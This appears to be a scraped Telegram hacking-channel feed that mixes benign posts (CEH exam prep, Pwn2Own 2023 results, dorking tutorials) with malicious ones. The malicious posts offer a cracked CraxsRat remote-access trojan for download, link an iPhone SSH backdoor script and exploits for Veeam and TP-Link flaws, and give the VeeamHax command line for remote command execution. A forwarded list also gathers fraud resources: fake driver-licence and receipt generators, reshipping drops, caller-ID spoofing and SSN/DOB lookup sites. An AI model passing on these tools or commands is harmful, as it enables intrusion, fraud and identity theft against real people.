CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
15.9K subscribers
1.89K photos
386 videos
722 files
3.67K links
Official Websites: https://crackcodes.in | https://system32.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
Admin Math: prapattimynk.crackcodes.in


Be Secure~
เคœเคฏ เคถเฅเคฐเฅ€ เคฐเคพเคฎ
Download Telegram
โ€‹โ€‹CEH-Exam-Questions

Planning To Take Certified Ethical Hacker (CEH)? Here are github repo with 125 questions and answers to help you prep for the test.

https://github.com/ryh04x/CEH-Exam-Questions

#cybersecurity #infosec
โ€‹โ€‹iPhone-SSH-Backdoor

This is a shell script that creates an SSH backdoor on an iPhone.

https://github.com/SleepTheGod/iPhone-SSH-Backdoor

#cybersecurity #infosec
๐Ÿ”ฐ| ADVANCED GOOGLE DORKING  |๐Ÿ”ฐ


๐Ÿ“Œ  1. Unlocking the Secrets of Google Dorking: A Beginnerโ€™s Guide to Search Hacking

๐Ÿ”— Link :- https://thecyberblogs.com/google-searching-basics-part-1/

๐Ÿ“Œ 2. Mastering the Art of Google Dorking: The Basic Rules You Need to Know

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-the-art-of-google-dorking-the-basic-rules-you-need-to-know/

๐Ÿ“Œ 3. Mastering Google Dorking: Understanding the Basic Syntax

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-understanding-the-basic-syntax/

๐Ÿ“Œ 4. Mastering Google Dorking: Unleashing the Power of Extended Search Operators

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-extended-search-operators/

๐Ÿ“Œ 5. Mastering Google Dorking: Unleashing the Power of Advanced Search Operators

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/

๐Ÿ“Œ 6. Google Dorking: From Basic to Advanced Techniques for Smarter Web Searches

๐Ÿ”— Link :- https://thecyberblogs.com/mastering-google-dorking-unleashing-the-power-of-advanced-search-operators/

๐Ÿ“Œ 7. Unlocking the Power of Googleโ€™s Regex System for Smarter Searches

๐Ÿ”— Link :- https://thecyberblogs.com/learning-google-regex-system/

๐Ÿ“Œ 8. Uncovering SQL Injection Vulnerabilities with Google Dorking: A Step-by-Step Guide

๐Ÿ”— Link :- https://thecyberblogs.com/sqli-error-vulnerability/

๐Ÿ“Œ 9. Stringed or extended dorks

๐Ÿ”— Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/

๐Ÿ“Œ 10. Master Google Dorking with a Practical Example | Boost Your Online Security Today

๐Ÿ”— Link :- https://thecyberblogs.com/learn-how-to-string-extend-google-dorks-part-9/

๐Ÿ“Œ 11. Uncover Hidden Information with Practical Examples of Google Dorking

๐Ÿ”— Link :- https://thecyberblogs.com/finding-various-vulnerabilities-using-google-dorking-part-9-1/

๐Ÿ“Œ 12. Advance google dorking cheatsheet pdf

๐Ÿ”— Link :- https://bit.ly/3T9EMP4
๐Ÿ‘1
๐Ÿ’ฅ"Actual" image recovery:
1๏ธโƒฃTake a JPEG image
2๏ธโƒฃMake a copy of it
3๏ธโƒฃCrop it in Snipping Tool
4๏ธโƒฃSave/overwrite
4๏ธโƒฃIn a hex editor, overwrite the EOI Marker (0xFFD9)
5๏ธโƒฃRepair it at http://jpg.repair
6๏ธโƒฃWonder how secure your cropped image data is
Forwarded from ๐™‹๐™ง๐™ค๐™ฉ๐™ค๐™˜๐™ค๐™ก ๐™‰๐™ž๐™˜๐™ 
#USEFUL SITES TO USE ON (Some Links Not Up To Date)

BROWSER FINGERPRINT TEST

https://panopticick.eff.org
https://whatleaks.com/

DRIVER LICENSE GENERATOR

https://www.elfqrin.com
http://www.highprogrammer.com/cgi-bin/uniqueid/dl

DROP/RESHIP

http://reship.com
https://www.myus.com
https://www.shipito.com
https://www.usunlocked.com/
https://virtualpostmail.com

DNS LEAK TEST

dnsleaktest.com
https://www.simplednscrypt.org/

VIRTUAL OFFICE

https://www.opusvirtualoffices.com/
https://www.regus.com/
https:cloudvo.com/
https://www.davincivirtual.com/fit-small-business
http://www.alliedoffices.com/

AREA PHONE CODES

https://www.allareacodes.com

SMS VERIFICATION

Smspool.net
https://app.truverifi.com/login
http://www.receive-sms-now.com
https://azersms.com/
http://www.textnow.com
https://www.blacktel.io/

SPOOF PHONE

https://www.spooftel.com
https://tracebust.com/
https://www.spoofcard.com
https:/ /securecall.club/login

USER AGENT CHECKER

http://whatsmyuseragent.com

FAX SENDER

https://portalpamfax.biz/PortalLogin/lnit/


FREE UDEMY COURSES

https://www.zapcourses.com
https://www.freshersgold.com


CUSTOM/FAKE RECEIPT MAKER

http://www.fakereceipt.us/sales_receipt.php
http://www.customreceipt.com/

SSN VALIDATOR

http://www.ssnvalidator.com

SSN DECODER

http://www.stevemorse.org/ssn/ssn.html

SOCKS CHECKER

https://fraud.cat/
https://xdedicvhnguh5s6k.onion/
https://www.ipqualityscore.com/
https://getipintel.net/index.php#web

EIN SEARCH

http://www.feinsearch.com
https://www.einfinder.com
htp://freerisa.benefitspro.com/
http://dor.wa.gov/content/doingbusiness/registermybusiness/BR
D/default.aspx
http://search.sunbiz.org/Inquiry/CorporationSearch/ByFeiNumber

RESIDENTIAL RDP ACCEPTING BITCOIN

https://www.resnetworking.com/
https://exavpn.com/
https:/ฤฑxdedicvhnguh5s6k.onion/

SSN/DOB SEARCH

https://ssndob.cc
https://robocheck.cm

MMN AUTOSEARCH

archives.com
ancestry.com

BACKGROUND CHECK

http://www.intelius.com
http://checkmate.com
http://equifax.com
http://thatsthem.com
https://www.mylife.com
https://t.me/tutorials_zone
https://www.peoplesmart.com
http://familytreenow.com
https://ogin.dicore.com/
https://www.tlo.com/
https://batchskiptracing.com/pricing/

CREDIT REPORT

https://www.quizzle.com
https://my.bankrate.com
freecreditreport.com
creditkarma.com/free-credit-report

โž–โž–โž–โž–โž–โž–โž–โž–โž–โž–
CraxsRat 4.0.1.rar
140.9 MB
CRAXS RAT V4 CRACKED

- FIXED BUILD
- NEW FUNCTIONS

Use It In VM Or RDP

Don't download = Not Working
๐Ÿ‘1
โ€‹โ€‹LeakySAB-PoC

PoC of 'LeakySAB' a vulnerability allowing extraction of usenet provider password from a SABnzbd instance.

https://github.com/rlaphoenix/LeakySAB-PoC

#cybersecurity #infosec
Forwarded from แดดแดฌแถœแดทแดธแดผแถœแดท
ALL ABOUT DARKWEB WITH PRACTICAL FOR BEGINNERS

BY - @localhost12hack

TIME - 7:30 PM ( TODAY )

OUR WEBSITE - system32.ink

ONLY ON THIS DISCUSSION GROUP๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡

@cyberdemonsD

SORRY YESTERDAY I WAS ๐Ÿ˜ท SO TODAY WE WILL DEFINITELY HOST THE SESSION
Forwarded from Prapatti ็ˆชใ„šๅ‡ าœ
|Pwn2Own Vancouver 2023 - Day One Results|
๐Ÿ’ฅ STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points
๐Ÿ’ฅ Bien Pham from Qrious Security used an OOB Read and a stacked-based buffer overflow to exploit Oracle VirtualBox. He earns $40,000 and 4 Master of Pwn points.
๐Ÿ’ฅ Synacktiv was able to execute their TOCTOU attack against Tesla โ€“ Gateway. They earn $100,000 as well as 10 Master of Pwn points and a Tesla Model 3.
๐Ÿ’ฅSTAR Labs successfully executed their attack against Ubuntu Desktop, but the exploit was previously known. They still earn $15,000 and 1.5 Master of Pwn points.
๐Ÿ’ฅ Marcin Wiฤ…zowski used an improper input validation bug to elevate privileges on Windows 11. He earns $30,000 and 3 Master of Pwn points.
๐Ÿ’ฅ Synacktiv used a TOCTOU bug to escalate privileges on Apple macOS. They earn $40,000 and 4 Master of Pwn points.
๐Ÿ‘2
Forwarded from Prapatti ็ˆชใ„šๅ‡ าœ
CrackCodes ๐Ÿ‡ฎ๐Ÿ‡ณ
|Pwn2Own Vancouver 2023 - Day One Results| ๐Ÿ’ฅ STAR Labs was able to execute a 2-bug chain against Microsoft SharePoint. They earn $100,000 and 10 Master of Pwn points ๐Ÿ’ฅ Bien Pham from Qrious Security used an OOB Read and a stacked-based buffer overflow to exploitโ€ฆ
|Pwn2Own Vancouver 2023 - Day Two Results|
๐Ÿ’ฅ Thomas Imbert and Thomas Bouzerar from Synacktiv demonstrated a 3-bug chain against Oracle VirtualBox with a Host EoP. One bug was previously known. They still earn $80,000 and 8 Master of Pwn points.
๐Ÿ’ฅ @hoangnx99, @rskvp93, and @_q5ca from Team Viettel used a 2-bug chain in their attempt against Microsoft Teams. They earn $75,000 and 8 Master of Pwn points.
๐Ÿ’ฅ David Berard and Vincent Dehors from Synacktiv used a heap overflow and an OOB write to exploit Tesla - Infotainment Unconfined Root. They qualify for a Tier 2 award, earning $250,000 and 25 Master of Pwn points.
๐Ÿ’ฅ dungdm of Team Viettel used an uninitialized variable and a UAF bug to exploit Oracle VirtualBox. They earn $40,000 and 4 Master of Pwn points.
Forwarded from Prapatti ็ˆชใ„šๅ‡ าœ
CVE-2023-27532
Yes, again Veeam Backup & Replication
Leakage of accounts in plain text, or remote execution of a command.
*

ะะฝะฐะปะธั‚ะธะบะฐ
*
POC exploit
*
usage:
VeeamHax.exe --target 192.168.0.100
ะธะปะธ
VeeamHax.exe --target 192.168.0.100 --cmd calc.exe

#veeam #rce #leakPass
(CVE-2023-28760, critical RCE vulnerability in TP-Link AX1800 Wi-Fi 6 Routers).

Exploit for CVE-2023-28760

Exploit: https://system32.ink/news-feed/p/271/
โค1๐Ÿ”ฅ1
Hello ๐Ÿ‘‹

Join this group to get Free webinar on Network pentesting

https://chat.whatsapp.com/IITnfm1MT2g1SOK4RIGcBK
Forwarded from แดดแดฌแถœแดทแดธแดผแถœแดท
HOW TO SURF ANONYMOUSLY?
ALL ABOUT PROXIES ๐Ÿ˜ˆ
FOR BEGINNERS

BY - @localhost12hack

TIME - STARTING IN 2 MINUTES

OUR WEBSITE - system32.ink

ONLY ON THIS DISCUSSION GROUP๐Ÿ‘‡๐Ÿ‘‡๐Ÿ‘‡

@cyberdemonsD